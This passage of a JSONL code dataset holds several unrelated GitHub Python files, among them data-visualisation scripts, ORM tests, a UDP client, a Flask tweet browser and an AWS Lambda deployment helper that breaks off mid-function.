gene,pm)\n            mutation_count = count_mutation(merged_sample_df, gene,pm)\n            counts.append({\n                'Gene': gene,\n                'Sample_Types': pm,\n                'Amplification': amplification_count,\n                'Deletion': deletion_count,\n                'Mutation': mutation_count,\n                'Total': total,\n                'Amplification_Fraction': amplification_count / total,\n                'Deletion_Fraction': deletion_count / total,\n                'Mutation_Fraction': mutation_count / total\n            })\n    \n    counts_df = pd.DataFrame(counts)\n\n    # Base chart\n    base = alt.Chart(counts_df).encode(\n        alt.X('Gene', sort=alt.EncodingSortField(field='Gene', op='count', order='ascending')),\n        alt.Y('Sample_Types', axis=alt.Axis(labelFontSize=9),\n              sort=alt.EncodingSortField(field='Sample_Types', op='count', order='ascending')),\n    )\n\n    # Create Amplification heatmap\n    amp_heatmap = base.mark_rect().encode(\n        alt.Color('Amplification_Fraction:Q', scale=alt.Scale(scheme='reds')),\n    ).properties(width=500,title='Amplification Heatmap')\n\n    # Create Deletion heatmap\n    del_heatmap = base.mark_rect().encode(\n        alt.Color('Deletion_Fraction:Q', scale=alt.Scale(scheme='blues')),\n    ).properties(width=500,title='Deletion Heatmap')\n\n    # Create Mutation heatmap\n    mut_heatmap = base.mark_rect().encode(\n        alt.Color('Mutation_Fraction:Q', scale=alt.Scale(scheme='greens')),\n    ).properties(width=500,title='Mutation Heatmap')\n    \n    #cna plot\n    bar_cna_df_T = filtered_cna_df.set_index('Hugo_Symbol').T\n    bar_cna_df_T.reset_index(inplace=True)\n    bar_cna_df_T = bar_cna_df_T.rename(columns={'index': 'SAMPLE_ID'})\n    merged_bar_cna_df_T = sample_df_filtered_cancer_types.merge(bar_cna_df_T, on='SAMPLE_ID', how='left') \n    index = merged_bar_cna_df_T.columns.get_loc('patient_count')\n    cna_id_vars = merged_bar_cna_df_T.columns[:index+1]\n    df_tall = pd.melt(merged_bar_cna_df_T, id_vars=cna_id_vars, var_name='Gene', value_name='Copy_Number')\n    df_tall['Copy_Number_Status'] = df_tall['Copy_Number'].apply(\n        lambda x: 'Amplification' if x > 0 else ('Deletion' if x < 0 else None)\n    )\n    cna_counts = df_tall.groupby(['Gene', 'Sample_Types', 'Copy_Number_Status']).size().reset_index(name='Count')\n\n    cna_chart = alt.Chart(cna_counts).mark_bar().encode(\n        x='Gene:N',\n        y='Count:Q',\n        color=alt.Color('Copy_Number_Status:N', scale=alt.Scale(domain=['Deletion', 'Amplification'],\n                                                                range=['blue', 'red'])),\n        column= alt.Column('Sample_Types:N', header=alt.Header(title=None)) \n    ).properties(\n        width=180,title='Copy Number Count')\n    \n    #variant classification plot\n    vc_mut_df = filtered_mut_df[[\"Hugo_Symbol\", \"Tumor_Sample_Barcode\", \"Variant_Classification\"]]\n    vc_mut_df = vc_mut_df.groupby([\"Tumor_Sample_Barcode\", \"Hugo_Symbol\",\"Variant_Classification\"]).size().reset_index(name='Count')\n    vc_mut_df = vc_mut_df.rename(columns={'Tumor_Sample_Barcode': 
'SAMPLE_ID'})\n\n merged_vc_mut_df = sample_df_filtered_cancer_types.merge(vc_mut_df, on='SAMPLE_ID', how='inner')\n grouped_df = merged_vc_mut_df.groupby(['Hugo_Symbol', 'Sample_Types', 'Variant_Classification']).size().reset_index(name='Count')\n\n vc_chart = alt.Chart(grouped_df).mark_bar().encode(\n x=alt.X('Hugo_Symbol:N', title='Gene'),\n y='Count:Q',\n color='Variant_Classification:N',\n column=alt.Column('Sample_Types:N', header=alt.Header(title=None)) \n ).properties(width=180, title='Variant Classification Count')\n\n all_chart = amp_heatmap & del_heatmap & mut_heatmap & cna_chart & vc_chart\n\n return all_chart\n","repo_name":"huntbeat/bmi706-final-project","sub_path":"jason.py","file_name":"jason.py","file_ext":"py","file_size_in_byte":8094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16491408459","text":"# for end to end projects we need lots of files and folders and we need to manage our code, so instead of creatig those file maunally , we will creat one python script and and write one logic here\n\n# Import some libraries\nimport os #operating system\nfrom pathlib import Path #path \nimport logging\n\nlogging.basicConfig(level=logging.INFO, format='[%(asctime)s]: %(message)s:') #time the code is executed and the error message\n\n\nproject_name = \"mlProject\"\n\n#first it will create a src folder which will contain the project files \nlist_of_files = [\n \".github/workflows/.gitkeep\", # we need this for cicd deplyoment using github action\n f\"src/{project_name}/__init__.py\", #all the constructors will be insde the src folder\n f\"src/{project_name}/components/__init__.py\",\n f\"src/{project_name}/utils/__init__.py\",\n f\"src/{project_name}/utils/common.py\",\n f\"src/{project_name}/config/__init__.py\",\n f\"src/{project_name}/config/configuration.py\",\n f\"src/{project_name}/pipeline/__init__.py\",\n f\"src/{project_name}/entity/__init__.py\",\n f\"src/{project_name}/entity/config_entity.py\",\n f\"src/{project_name}/constants/__init__.py\",\n \"config/config.yaml\", # all of the configuration of the project\n \"params.yaml\",\n \"schema.yaml\",\n \"main.py\",\n \"app.py\",\n \"Dockerfile\",\n \"requirements.txt\",\n \"setup.py\",\n \"research/trials.ipynb\",\n \"templates/index.html\",\n #\"test.py\" #to create another file just write here\n\n\n]\n\n\n\n\nfor filepath in list_of_files:\n filepath = Path(filepath)\n filedir, filename = os.path.split(filepath) #separating directory/folder from filesystem/path\n\n#checking if folder exsits or not, if not then create a new directory and log the information\n if filedir !=\"\":\n os.makedirs(filedir, exist_ok=True)\n logging.info(f\"Creating directory; {filedir} for the file: {filename}\")\n\n#chekcing if file exists or not, if not then create a new file and log the information\n if (not os.path.exists(filepath)) or (os.path.getsize(filepath) == 0):\n with open(filepath, \"w\") as f:\n pass\n logging.info(f\"Creating empty file: {filepath}\")\n\n#if everything is right, just pass the infor, that it exists\n else:\n logging.info(f\"{filename} is already exists\")\n","repo_name":"Pan2707/End-to-end-ML-project-with-ML-flow","sub_path":"template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33982557880","text":"# coding = utf-8\n\nimport comall\nimport time\nimport unittest\nimport setting.qiguojie.setting as my_set\nfrom 
setting.qiguojie import data\nfrom setting.qiguojie import el\n\n\nclass QiGuoJieTest(unittest.TestCase):\n\n def setUp(self):\n self.dr = comall.Comall(my_set.driver_type)\n self.dr.open(my_set.local_url)\n self.dr.max_window()\n time.sleep(3)\n\n def test_next_window(self):\n qq = self.dr\n qq.click(\"xpath\", el.localhost_open_window_a)\n\n qq.switch_next_window()\n\n qq.send_keys(\"xpath\", \"//*[@id='kw']\", \"qiguojie\")\n\n qq.click(\"xpath\", \"//*[@id='su']\")\n\n\n def tearDown(self):\n # qq = self.dr\n # qq.quit()\n pass\n\n\n# The code below lets this script run standalone for debugging\nif __name__ == \"__main__\":\n suite = unittest.TestLoader().loadTestsFromTestCase(QiGuoJieTest)\n result = unittest.TextTestRunner(verbosity=2).run(suite)","repo_name":"huiboSong/tester","sub_path":"tests/members/qiguojie/qiguojie_study_03.py","file_name":"qiguojie_study_03.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30732276615","text":"\nclass BinaryTree():\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n \n def add(self, value):\n pass\n\n\npre_order=[]\nin_order=[]\npost_order=[]\ndef BSTTraversal(node):\n if node is None:\n return\n \n global pre_order\n pre_order.append(node.value)\n\n BSTTraversal(node.left)\n\n global in_order\n in_order.append(node.value)\n \n BSTTraversal(node.right)\n\n global post_order\n post_order.append(node.value)\n\n\n\n\ndef test():\n root = BinaryTree(10)\n root.left = BinaryTree(5)\n root.right = BinaryTree(15)\n root.left.left = BinaryTree(1)\n root.left.right = BinaryTree(7)\n root.right.left = BinaryTree(13)\n root.right.right = BinaryTree(18)\n\n\n sums = BSTTraversal(root)\n print(pre_order)\n print(in_order)\n print(post_order)\n\n\ntest()","repo_name":"pavancd/algorithms","sub_path":"BSTTraversal/BSTTraversal.py","file_name":"BSTTraversal.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10722063240","text":"import pytest\nfrom tests.settings import DATABASE_URL\n\nimport edgy\nfrom edgy.core.db.fields.core import Field\nfrom edgy.exceptions import MultipleObjectsReturned, ObjectNotFound\nfrom edgy.testclient import DatabaseTestClient as Database\n\ndatabase = Database(url=DATABASE_URL)\nmodels = edgy.Registry(database=database)\n\npytestmark = pytest.mark.anyio\n\n\nclass User(edgy.Model):\n id: int = edgy.IntegerField(primary_key=True)\n name: str = edgy.CharField(max_length=100, null=True)\n language: str = edgy.CharField(max_length=200, null=True)\n\n class Meta:\n registry = models\n\n\nclass Product(edgy.Model):\n id: int = edgy.IntegerField(primary_key=True)\n name: str = edgy.CharField(max_length=100, null=True)\n rating: int = edgy.IntegerField(minimum=1, maximum=5, default=1)\n in_stock: bool = edgy.BooleanField(default=False)\n\n class Meta:\n registry = models\n name = \"products\"\n\n\n@pytest.fixture(autouse=True, scope=\"function\")\nasync def create_test_database():\n await models.create_all()\n yield\n await models.drop_all()\n\n\n@pytest.fixture(autouse=True)\nasync def rollback_connections():\n with database.force_rollback():\n async with database:\n yield\n\n\ndef test_model_class():\n assert list(User.fields.keys()) == [\"id\", \"name\", \"language\"]\n assert isinstance(User.fields[\"id\"], Field)\n assert User.fields[\"id\"].primary_key is True\n assert isinstance(User.fields[\"name\"], Field)\n assert 
User.fields[\"name\"].max_length == 100\n\n assert User(id=1) != Product(id=1)\n assert User(id=1) != User(id=2)\n assert User(id=1) == User(id=1)\n\n assert str(User(id=1)) == \"User(id=1)\"\n assert repr(User(id=1)) == \"\"\n\n assert isinstance(User.query.fields[\"id\"], Field)\n assert isinstance(User.query.fields[\"name\"], Field)\n\n\ndef test_model_pk():\n user = User(pk=1)\n assert user.pk == 1\n assert user.id == 1\n assert User.query.pkname == \"id\"\n\n\nasync def test_model_crud():\n users = await User.query.all()\n assert users == []\n\n user = await User.query.create(name=\"Test\")\n users = await User.query.all()\n assert user.name == \"Test\"\n assert user.pk is not None\n assert users == [user]\n\n lookup = await User.query.get()\n assert lookup == user\n\n await user.update(name=\"Jane\")\n users = await User.query.all()\n assert user.name == \"Jane\"\n assert user.pk is not None\n assert users == [user]\n\n await user.delete()\n users = await User.query.all()\n assert users == []\n\n\nasync def test_model_get():\n with pytest.raises(ObjectNotFound):\n await User.query.get()\n\n user = await User.query.create(name=\"Test\")\n lookup = await User.query.get()\n assert lookup == user\n\n user = await User.query.create(name=\"Jane\")\n with pytest.raises(MultipleObjectsReturned):\n await User.query.get()\n\n same_user = await User.query.get(pk=user.id)\n assert same_user.id == user.id\n assert same_user.pk == user.pk\n","repo_name":"tarsil/edgy","sub_path":"tests/models/test_model_class.py","file_name":"test_model_class.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"21"} +{"seq_id":"40795902956","text":"from Network import Client\nfrom UAP import Message, UAP\nimport random\nimport time\nimport socket\n\nclass UAPClient(Client):\n\n STATES = {\n \"Hello wait\" : 0,\n \"Ready\" : 1,\n \"Ready Timer\" : 2,\n \"Closing\" : 3,\n \"\" : 4,\n }\n\n def __init__(self, client : Client):\n self.instance = client\n self.state = UAPClient.STATES[\"Hello wait\"]\n\n self.instance.SendPacket = self.SendPacket\n self.instance.HandlePacket = self.HandlePacket\n self.instance.RecievePacket = self.RecievePacket\n\n\n def SendPacket(self, message : Message):\n self.instance.client_socket.sendall(message.EncodeMessage())\n self.seq += 1\n\n def HandlePacket(self, message : str, isEOF : bool = False):\n if self.state == UAPClient.STATES[\"Closing\"]:\n return\n \n if self.TimerTimeout():\n return self.Exit(\"Timeout\")\n\n if isEOF:\n self.SendPacket(Message(\n UAP.CommandEnum.GOODBYE,\n self.seq,\n self.sID,\n message\n ))\n self.Exit(message)\n while self.instance.running.is_set():\n pass\n return\n \n message = Message(\n UAP.CommandEnum.DATA, \n self.seq, \n self.sID, \n message\n )\n self.SendPacket(message)\n\n def RecievePacket(self):\n waitingState = False\n while self.instance.running.is_set():\n try:\n data, _ = self.instance.client_socket.recvfrom(1024)\n msg = Message.DecodeMessage(data)\n if msg.command == UAP.CommandEnum.HELLO:\n print(\"Recieved Hello from server\")\n if msg.command == UAP.CommandEnum.GOODBYE:\n self.instance.Exit(\"GOODBYE from server\")\n if msg.command == UAP.CommandEnum.ALIVE:\n self.TimerStart()\n except socket.timeout:\n if waitingState:\n self.instance.Exit(\"Timeout from wait\")\n else:\n self.waitingState = True\n\n\n def Run(self):\n # Session start hello\n self.sID = random.getrandbits(32)\n self.seq = 0\n helloMessage = Message(UAP.CommandEnum.HELLO, self.seq, 
self.sID, \"\")\n self.SendPacket(helloMessage)\n\n # Wait for hello\n self.instance.client_socket.settimeout(self.instance.timeout)\n while True: \n try:\n data, _ = self.instance.client_socket.recvfrom(1024)\n msg = Message.DecodeMessage(data)\n if msg.sID == self.sID and msg.command == UAP.CommandEnum.HELLO:\n self.state = UAPClient.STATES[\"Ready\"]\n break\n except KeyboardInterrupt:\n self.instance.Exit(\"Keyboard interrupt\")\n except socket.timeout:\n self.Exit(\"Timeout\")\n quit()\n except ConnectionRefusedError:\n self.Exit(\"Connection refused\")\n quit()\n \n self.TimerStart()\n self.instance.Run()\n\n def Exit(self, reason):\n print(\"Closing. Reason:\", reason)\n self.state = UAPClient.STATES[\"Closing\"]\n message = Message(\n UAP.CommandEnum.GOODBYE,\n self.seq,\n self.sID,\n reason\n )\n self.SendPacket(message)\n\n def TimerStart(self):\n self.timerStart = time.time()\n\n def TimerTimeout(self):\n return time.time() - self.timerStart > self.instance.timeout\n \nif __name__ == \"__main__\":\n import sys\n from ThreadedNetwork import ThreadedClient\n\n if len(sys.argv) < 3:\n print(\"Usage: UAPClient.py host port [client_recieve_port]\")\n quit()\n\n elif len(sys.argv) == 3: \n client = UAPClient(ThreadedClient(sys.argv[1], int(sys.argv[2])))\n else:\n client = UAPClient(ThreadedClient(sys.argv[1], int(sys.argv[2]), int(sys.argv[3])))\n\n client.Run()\n ","repo_name":"unniisme/Networking","sub_path":"UDPcommunicator/UAPClient.py","file_name":"UAPClient.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74131718131","text":"print(\"\"\"\n NOISE DECIBEL LEVELS\n Jackhammer 130db\n Gas Lawnmower 106db\n Alarm Clock 70db\n Quiet Room 40db\n\"\"\")\n\nJackhammer = 130\nGas_Lawnmower = 106\nAlarm_Clock = 70\nQuiet_Room = 40\n\nsl = int(input(\"Enter a sound level in decibel: \"))\n\nif Gas_Lawnmower < sl < Jackhammer:\n print(\"The sound level is between Gas Lawnmower and Jackhammer\")\nelif Alarm_Clock < sl < Gas_Lawnmower:\n print(\"The sound level is between Gas Lawnmower and Alarm Clock\")\nelif Quiet_Room < sl < Alarm_Clock:\n print(\"The sound level is between Quiet Room and Alarm Clock\")","repo_name":"GRAFRA346/Python-workbook-exercises","sub_path":"Sound_Levels.py","file_name":"Sound_Levels.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"940190368","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreate PFT map MEGAN\r\n\r\n@author: Jordan Capnerhurst 2016\r\n\"\"\"\r\n\r\n# import things\r\nfrom mpl_toolkits.basemap import Basemap\r\nimport matplotlib.pyplot as pyplot\r\nimport numpy as np\r\nimport netCDF4\r\nimport scipy.interpolate\r\n\r\n# Set colour map\r\ncool = cm = pyplot.get_cmap('rainbow')\r\n\r\nf = netCDF4.Dataset('O:\\Honours_data\\KMEGAN\\FebMEG.nc','r')\r\n\r\npf1 = netCDF4.Dataset('O:/Honours_data/JMEGAN/Plants/btr200121_30sec.nc','r') #broad leaf tree\r\npf2 = netCDF4.Dataset('O:/Honours_data/JMEGAN/Plants/hrb200121_30sec.nc', 'r') #Herbacioius\r\npf3 = netCDF4.Dataset('O:/Honours_data/JMEGAN/Plants/ntr200121_30sec.nc', 'r') # needle leaf\r\npf4 = netCDF4.Dataset('O:/Honours_data/JMEGAN/Plants/shr200121_30sec.nc', 'r') # Shrubs\r\n\r\n# [ time, source, lon, lat ]\r\nv = (pf1.variables['Broadleaf_tree_cover_fraction_for_year_2001_(m2_per_m2)'])\r\n#vma = np.ma.masked_less_equal(v, 10)\r\n\r\nv1 = 
(pf2.variables['Herbaceous_vegetation_cover_fraction_for_year_2001_(m2_per_m2)'])\r\n#vma1 = np.ma.masked_less_equal(v1, 10)\r\n\r\nv2 = (pf3.variables['Needleleaf_tree_cover_fraction_for_year_2001_(m2_per_m2)'])\r\n#vma2 = np.ma.masked_less_equal(v2, 10)\r\n\r\nv3 = (pf4.variables['Shrub_cover_fraction_for_year_2001_(m2_per_m2)'])\r\n#vma3 = np.ma.masked_less_equal(v3, 10)\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n# new 3-km grid\r\nglon3 = f.variables['lon'][:]\r\nglat3 = f.variables['lat'][:]\r\n\r\n# dlon, dlat = spacing (keep extra just in case)\r\ndlon3 = glon3[-1] - glon3[-2]\r\ndlat3 = glat3[-1] - glat3[-2]\r\n\r\n\r\n# old 1-km grid\r\nglon1 = pf1.variables['lon'][:]\r\nglat1 = pf1.variables['lat'][:]\r\n\r\n\r\n# Cut LAI & old lon/lat to match size of new grid (makes it a lot faster!!)\r\nlonind = np.where((glon1 >= glon3[0]-dlon3) & (glon1 <= glon3[-1]+dlon3))\r\nv = v[:,lonind[0][:]]\r\nglon1 = glon1[lonind[0][:]]\r\n\r\nlatind = np.where((glat1 >= glat3[0]-dlat3) & (glat1 <= glat3[-1]+dlat3))\r\nv = v[latind[0][:],:]\r\nglat1 = glat1[latind[0][:]]\r\n\r\n#create mesh\r\nX, Y = np.meshgrid(glon1, glat1)\r\nXI, YI = np.meshgrid(glon3, glat3)\r\n\r\n#interpolate\r\nPFTnew=scipy.interpolate.griddata((X.flatten(),Y.flatten()),v.flatten() , (XI,YI), method='linear')\r\n\r\nPFTmask = np.ma.masked_less_equal(PFTnew, 10)\r\n\r\n#------------------------------------------------------------------------------\r\ntrans = 0.6\r\n\r\nmap = Basemap(llcrnrlon=150.1,\r\n llcrnrlat=-34.7177,\r\n urcrnrlon=151.651,\r\n urcrnrlat=-33.5651, epsg=4269)\r\n \r\n #http://server.arcgisonline.com/arcgis/rest/services\r\n #EPSG Number of America is 4269\r\n\r\n\r\n\r\nf=pyplot.figure()\r\n\r\npyplot.figure(figsize=(10, 10))\r\n\r\n\r\n \r\n# plot the data\r\ncol=map.pcolormesh(glon3,glat3,PFTmask,latlon=True,vmin=0, vmax = 100, alpha=trans,cmap=cool)\r\n\r\n\r\n# Draw Meridians and labels\r\nmap.drawmeridians(np.arange(0, 360, 1), labels=[0, 0, 0, 1], fontsize=10,\r\n color='black', linewidth=2)\r\nmap.drawparallels(np.arange(-90, 90, 1), labels=[1, 0, 0, 0], fontsize=10,\r\n color='black', linewidth=2)\r\n\r\nmap.arcgisimage(service='World_Imagery', xpixels = 1000, verbose= True)\r\n\r\n# add a color bar\r\ncb = map.colorbar(col, \"bottom\", alpha=trans)\r\n\r\npyplot.title(\"MEGAN Domain 3 Shrub cover \\n Sydney Metropolitan \\\r\nRegion Feburary 2011\", fontsize=10)\r\n\r\n\r\n\r\n#plt.savefig('./bmap_syd.tiff')\r\n\r\n\r\n","repo_name":"jordanc365/Atmos-chem-models","sub_path":"3x3 PFT map ME D3.py","file_name":"3x3 PFT map ME D3.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73280005171","text":"from backtrader.comminfo import CommInfoBase\n\n\nclass OandaV20CommInfoBacktest(CommInfoBase):\n\n params = dict(\n spread=2.0,\n stocklike=False,\n pip_location=-4,\n acc_counter_currency=True,\n automargin=1.00,\n leverage=1,\n mult=1,\n commtype=CommInfoBase.COMM_FIXED,\n )\n\n def getvaluesize(self, size, price):\n # In real life the margin approaches the price\n return abs(size) * price\n\n def getoperationcost(self, size, price):\n '''Returns the needed amount of cash an operation would cost'''\n # Same reasoning as above\n return abs(size) * price\n\n def _getcommission(self, size, price, pseudoexec):\n '''\n This scheme will apply half the commission when buying and half when selling.\n If account currency is same as the base currency, 
change pip value calc.\n https://community.backtrader.com/topic/525/forex-commission-scheme\n '''\n multiplier = float(10 ** self.p.pip_location)\n comm = abs((self.p.spread * ((size / price) * multiplier)/2))\n return comm\n","repo_name":"brightcircledevops/btoandav20","sub_path":"btoandav20/commissions/oandav20comm.py","file_name":"oandav20comm.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"71818459894","text":"from flask import render_template, Blueprint, request, redirect, url_for, g\n\nfrom sqlalchemy import func, select, Table, Column, Integer, String, and_, sql\nfrom sqlalchemy.sql.expression import text, and_\nfrom paginate_sqlalchemy import SqlalchemySelectPage, SqlalchemyOrmPage\n\nimport crosstab\n\nfrom flock import model\nfrom flock_web.app import db, url_for_other_page\n\n\nbp_root = Blueprint(\n 'root', __name__,\n static_folder='static',\n template_folder='templates',\n url_prefix='/'\n )\n\n\n@bp_root.url_defaults\ndef add_collection(endpoint, values):\n values.setdefault('collection', getattr(g, 'collection', None))\n\n\n@bp_root.url_value_preprocessor\ndef pull_collection(endpoint, values):\n g.collection = values.pop('collection')\n\n\n@bp_root.route('/')\ndef index():\n return redirect(url_for('.tweets'))\n\n\ndef feature_query_args():\n feature_query = request.args.copy()\n return feature_query\n\n\n@bp_root.route('/tweets')\ndef tweets():\n page_num = int(request.args.get('_page', 1))\n items_per_page = int(request.args.get('_items_per_page', 20))\n\n feature_query = feature_query_args()\n\n tweets = (\n db.session.query(model.Tweet)\n .filter(model.Tweet.collection == g.collection)\n .filter(*(model.Tweet.features.contains({k: [v]}) for k, v in feature_query.items() if not k.startswith('_')))\n .order_by(model.Tweet.created_at, model.Tweet.tweet_id)\n )\n\n page = SqlalchemyOrmPage(\n tweets,\n page=page_num, items_per_page=items_per_page,\n url_maker=url_for_other_page,\n )\n\n return render_template(\n 'root/tweets.html',\n page=page,\n )\n\n\n@bp_root.route('/tweets/')\ndef features(feature_name):\n other_feature = request.args.get('_other', None)\n unstack = request.args.get('_unstack', None) if other_feature is not None else None\n other_feature_values = None\n\n page_num = int(request.args.get('_page', 1))\n items_per_page = int(request.args.get('_items_per_page', 20))\n\n feature_query = feature_query_args()\n\n features_to_filter = [model.Tweet.features.contains({k: [v]}) for k, v in feature_query.items() if not k.startswith('_')]\n feature_select = (\n select(['feature', func.count()])\n .select_from(\n text(\n ('tweet, ' if not features_to_filter else '') +\n 'jsonb_array_elements_text(tweet.features->:feature) as feature'\n ).bindparams(feature=feature_name)\n )\n .where(\n and_(\n sql.literal_column('collection') == g.collection,\n *features_to_filter,\n )\n )\n .group_by('feature')\n .order_by(func.count().desc())\n )\n\n page = SqlalchemySelectPage(\n db.session, feature_select,\n page=page_num, items_per_page=items_per_page,\n url_maker=url_for_other_page,\n )\n items = page.items\n\n if other_feature is not None:\n feature_column = sql.literal_column('feature', String)\n other_feature_column = sql.literal_column('other_feature', String)\n stmt = (\n select(\n [feature_column, other_feature_column, func.count()]\n )\n .select_from(\n text(\n 'tweet, '\n 'jsonb_array_elements_text(tweet.features->:feature) as feature, '\n 
'jsonb_array_elements_text(tweet.features->:other_feature) as other_feature'\n ).bindparams(feature=feature_name, other_feature=other_feature)\n ).where(\n and_(\n sql.literal_column('collection') == g.collection,\n feature_column.in_(\n feature_select\n .with_only_columns(['feature'])\n .offset((page_num - 1) * items_per_page)\n .limit(items_per_page)\n )\n )\n )\n .group_by(feature_column, other_feature_column)\n )\n\n items = db.session.execute(stmt.order_by(func.count().desc()))\n\n if unstack:\n other_feature_values_select = (\n select([other_feature_column.distinct()])\n .select_from(stmt.alias())\n )\n other_feature_values = [\n v for v, in\n db.session.execute(other_feature_values_select.order_by(other_feature_column))\n ]\n\n from sqlalchemy import MetaData\n ret_types = Table(\n '_t_', MetaData(),\n Column('feature', String),\n extend_existing=True,\n *[Column(v, Integer) for v in other_feature_values]\n )\n\n row_total = crosstab.row_total(\n [ret_types.c[v] for v in other_feature_values]\n ).label('total')\n\n stmt = (\n select(\n [\n '*', row_total,\n ]\n )\n .select_from(\n crosstab.crosstab(\n stmt,\n ret_types,\n categories=other_feature_values_select,\n )\n )\n .order_by(\n row_total.desc(),\n ret_types.c.feature,\n )\n )\n\n items = db.session.execute(stmt)\n\n return render_template(\n 'root/features.html',\n feature_name=feature_name,\n other_feature_name=other_feature,\n other_feature_values=other_feature_values,\n page=page,\n items=items,\n )\n","repo_name":"henryj885/flock","sub_path":"flock-web/flock_web/blueprints/root/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24920152415","text":"from urllib.parse import urlparse\r\nimport boto3\r\nfrom botocore.exceptions import ClientError\r\n\r\nfrom awsdest.utils.core_aws import *\r\n\r\ndef _isthere__s3_bucketfolder_notification_config(awsconfig, s3folder):\r\n parsed = urlparse(s3folder, allow_fragments=False)\r\n bucketin = parsed.netloc\r\n s3folder_prefix = parsed.path.lstrip('/')\r\n try:\r\n s3_client = boto3.client('s3', aws_access_key_id=awsconfig['aws_access_key_id'],\r\n aws_secret_access_key=awsconfig['aws_secret_access_key'])\r\n response = s3_client.get_bucket_notification_configuration(Bucket=bucketin)\r\n\r\n if 'LambdaFunctionConfigurations' in response or \\\r\n 'TopicConfigurations' in response or \\\r\n 'QueueConfigurations' in response :\r\n # print(\"This bucket does event config set\"\r\n return True\r\n\r\n return False\r\n\r\n # following will never be executed by design. 
Since we want to avoid creating event notifications if there is some on bucket already.\r\n # our process wipes out previous configurations.\r\n lambdaFuncConfigs_list = response['LambdaFunctionConfigurations']\r\n for lc in lambdaFuncConfigs_list:\r\n lc1 = lc['Filter']['Key']['FilterRules']\r\n for lc2 in lc1:\r\n if lc2['Name'] == \"Prefix\" and str.rstrip(lc2['Value'], \"/\") == str.rstrip(s3folder_prefix,\"/\"): # if folder prefix matches then there is a notification on that folder prefix\r\n print(\"This s3bucket:/folder has lambda function configuration already:\", lc)\r\n return True\r\n\r\n except ClientError as e:\r\n print(\"Error getting s3_event_configuration:\", e)\r\n return None\r\n\r\n\r\ndef validate_lambda_folders(awsconfig, s3folderin_lambda, s3folderout_lambda):\r\n if number_of_files_s3folder(awsconfig, s3folderin_lambda) < 0:\r\n print(\"S3 input folder non existent.\")\r\n return False\r\n\r\n if number_of_files_s3folder(awsconfig, s3folderout_lambda) < 0:\r\n print(\"S3 output folder non existent.\")\r\n return False\r\n\r\n # check if input and output folders are the same. We do not want events/triggers that result in an infinite loop of executions\r\n if str.rstrip(s3folderin_lambda, \"/\") == str.rstrip(s3folderout_lambda, \"/\"):\r\n print(\" cannot have input and output folders same to prevent infinite lambda loop triggers\")\r\n return False\r\n\r\n # check if there are events/lambda defined on this bucket and folder specifically\r\n # we do not want conflicts. So being extra careful.\r\n if _isthere__s3_bucketfolder_notification_config(awsconfig, s3folderin_lambda):\r\n print(\"Event configuration exists on this bucket. Do not want to create additional configuration:\",
Do not want to create additional configuration:\",\r\n s3folderout_lambda)\r\n return False\r\n\r\n return True\r\n\r\n\r\ndef create_lambda_layer(awsconfig, lambdaconfig):\r\n l = open('lambda_layers/lambda_layers_k8s_requests_etc_packages_1.zip', 'rb')\r\n layer_zipfile = l.read()\r\n\r\n try:\r\n lambda_client = boto3.client('lambda', aws_access_key_id=awsconfig['aws_access_key_id'],\r\n aws_secret_access_key=awsconfig['aws_secret_access_key'])\r\n response = lambda_client.publish_layer_version(LayerName='lambda_scoring_layer',\r\n Content={'ZipFile': layer_zipfile\r\n },\r\n )\r\n lambda_layer_arn = response['LayerArn']\r\n lambda_layer_version = response['Version']\r\n\r\n #layer_arn_ver = 'arn:aws:lambda:us-east-1:617292774228:layer:lambda_scoring_layer:1'\r\n #response = lambda_client.add_layer_version_permission(\r\n # LayerName='lambda_scoring_layer',\r\n # VersionNumber='$LATEST',\r\n # StatementId='1',\r\n # Action='lambda:GetLayerVersion',\r\n # Principal='*'\r\n #)\r\n\r\n return (lambda_layer_arn, lambda_layer_version)\r\n\r\n except ClientError as e:\r\n print(\"Error creating lambda layer:\", e)\r\n return None\r\n\r\n\r\ndef _create_lambda_function(awsconfig, lambdaconfig, k8sconfig, model_imagename, s3folderin_lambda, s3folderout_lambda):\r\n aws_eks_cluster_name = awsconfig['aws_eks_cluster_name']\r\n ingress_controller_url = awsconfig['ingress_controller_url']\r\n aws_region = awsconfig['aws_region']\r\n k8s_namespace = k8sconfig['k8s_namespace']\r\n\r\n lambda_execution_role = lambdaconfig['lambda_execution_arn_role']\r\n lambda_function_name = lambdaconfig['lambda_function_name']\r\n lambda_layer_arn = lambdaconfig['lambda_layer_arn']\r\n lambda_layer_version = lambdaconfig['lambda_layer_version']\r\n\r\n f = open('lambda_function_dependencies/lambdafunc_scoring_dependencies.zip', 'rb')\r\n function_zipfile = f.read()\r\n\r\n try:\r\n lambda_client = boto3.client('lambda', aws_access_key_id=awsconfig['aws_access_key_id'],\r\n aws_secret_access_key=awsconfig['aws_secret_access_key'])\r\n\r\n lambda_layer_arn_version = lambda_layer_arn + \":\" + lambda_layer_version\r\n\r\n response = lambda_client.create_function(\r\n FunctionName=lambda_function_name,\r\n Runtime='python3.7',\r\n Role=lambda_execution_role,\r\n 